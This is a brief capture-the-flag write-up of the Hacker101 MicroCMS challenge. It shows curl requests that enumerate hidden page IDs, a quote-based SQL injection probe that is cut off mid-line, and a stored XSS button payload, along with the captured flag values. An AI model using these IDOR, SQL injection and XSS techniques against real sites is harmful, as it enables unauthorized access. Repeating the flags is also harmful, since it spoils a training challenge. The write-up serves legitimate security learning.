Easy - MicroCMS Link to heading
Flag 0x01 Link to heading
Here we’ve got a simple CMS web app, we can edit existing pages with markdown text editor, we can also create new pages with the same markdown editor.
The markdown editor has a hint:
Markdown is supported, but scripts are not
Local repo:
So I tried to inject JS and HTML random stuff, rendering of injects were parsed as expected:
Except in the pages list where the titles rendered html successfully (and potentially JS):
Flag 0x02 Link to heading
The CMS shows only 2 pages and we are able to edit those, looping through the page id on the url we can see there is one more page hidden from the list:
n0kt.b0wer:.../ctf-notes/h1 (main) ➜ curl 'https://91c75d076bf3833b783dc5e5541638f1.ctf.hacker101.com/page/edit/7' [14:11:06]
<!doctype html>
<title>Edit page</title>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="Private Page"><br>
<textarea name="body" rows="10" cols="80">My secret is ^FLAG^*******************5aed9107eb5bf097afc1fadb7f82c85e3263a1$FLAG$</textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
Flag 0x03 Link to heading
Found SQLi:
n0kt.b0wer:.../ctf-notes/h1 (main) ➜ curl "https://91c75d076bf3833b783dc5e5541638f1.ctf.hacker101.com/page/edit/2'" [14:40:
Flag 0x04 Link to heading
The last one is to edit any markdown page and put an html with xss injected, after saved, check the src:
n0kt.b0wer:.../ctf-notes/h1 (main) ➜ curl -s 'https://91c75d076bf3833b783dc5e5541638f1.ctf.hacker101.com/page/2' | ag FLAG [14:44:33]
<button flag="^FLAG^607b6e4f74f4078ba71a6adc3596cad90022dd897e88d8fbf74d8ce6bf9e4ca2$FLAG$" onclick=alert(‘xss’)>click</button></p>